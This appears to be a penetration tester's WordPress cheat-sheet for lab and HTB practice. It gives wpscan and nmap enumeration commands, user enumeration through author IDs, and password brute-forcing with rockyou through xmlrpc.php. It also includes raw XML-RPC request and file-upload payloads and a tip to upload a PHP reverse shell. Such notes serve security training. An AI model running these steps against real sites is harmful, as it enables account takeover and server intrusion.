Wordpress
Version #
- On meta generators
- Check interesting URL paths below
Credentials #
- Seems you really need to find valid credentials to wordpress before exploiting
- Try going to
/?author=1
and enumerate from there to see the usernames - There is no default credentials. Installation will ask user to provide the creds.
- You can guess valid usernames though
Recon #
# Kickoff nmap
nmap -p80 --script http-wordpress-enum,http-wordpress-users 10.10.71.200
# Using wpscan (you can remove api token but some
# information will not be displayed)
# NOTE: wpscan may not report all vulnerabilities specially
# on plugins
wpscan --url http://10.10.10.29 --api-token {API_TOKEN}
# Similar to above but on another path
wpscan --url http://10.10.10.29/wordpress --api-token {API_TOKEN}
- Check for
colorlib
in HTML elements. This is a WP plugin.
Interesting URL Paths #
# you may find version here
/wp-links-opml
/wp-links-opml.php
/readme.html
# uploads directory
/wp-content/uploads/YYYY/DD/FILENAME
# login
/wp-login.php
Interesting files #
# DB credentials
wp-config.php
Brute Force #
# Using nmap
map -p80 --script http-wordpress-brute 10.10.10.29
# User IDs can be extracted from here. You can use
# burp sniper intruder and generate a list of user
# id from 1 to 100 using bash for loop.
curl -s -I -X GET http://10.10.10.29/?author=1
# You can use this python script from
# https://github.com/relarizky/wpxploit
# This can take around 30 minutes to complete
# TIP: try using "admin" as username first
cd ~/data/tools/webapp/wpxploit
./exploit.py http://10.10.127.229/wordpress 5 15
# You can also use wpscan
wpscan --url http://10.10.127.229/wordpress --usernames admin --passwords /usr/share/wordlists/rockyou.txt
- Once you have the credentials you can try uploading a PHP reverse shell
- TIP: bruteforce is done by sending this POST data containing username and password
<methodCall>
<methodName>
wp.getUsersBlogs
</methodName>
<params>
<param>
<value>
admin
</value>
</param>
<param>
<value>
gansta1
</value>
</param>
</params>
</methodCall>
Interesting URL Paths #
# most can be reported by wpscan
/wp-content/uploads/
/wp-admin/
/wp-admin/update-core.php
/wp-admin/upgrade.php
/install.php
/wp-cron.php
# can accept post requests if active
/xmlrpc.php
# others
/plugins
/wp-content/plugins
For xmlrpc.php, you can use burpsuite to send some POST requests like this.
POST /wordpress/xmlrpc.php HTTP/1.1
Host: 10.10.10.29
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 95
<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>
XML RPC calls #
# List all method calls
<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>
# Get blogs
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>username</value></param>
<param><value>password</value></param>
</params>
</methodCall>
# Uploading a file
<?xml version='1.0' encoding='utf-8'?>
<methodCall>
<methodName>wp.uploadFile</methodName>
<params>
<param><value><string>1</string></value></param>
<param><value><string>username</string></value></param>
<param><value><string>password</string></value></param>
<param>
<value>
<struct>
<member>
<name>name</name>
<value><string>filename.jpg</string></value>
</member>
<member>
<name>type</name>
<value><string>mime/type</string></value>
</member>
<member>
<name>bits</name>
<value><base64><![CDATA[---base64-encoded-data---]]></base64></value>
</member>
</struct>
</value>
</param>
</params>
</methodCall>
Themes #
- Maybe you can also find theme exploits?
Plugins #
- You can search for plugin exploits also, one way of determining the plugin used is via html elements. Version can also be determined there.
- You can also add
--plugins-detection aggressive --plugins-version-detection aggressive
inwpscan
Troubleshoting #
- Sending
POST
to/xmlrpc.php
produces 200 OK but withparse error. not well formed
message most likely caused by missing php/xml parser library inside the server. I encountered this in HTB Tenten.
References #
- Wordpress - HackTricks
- HTB Tenten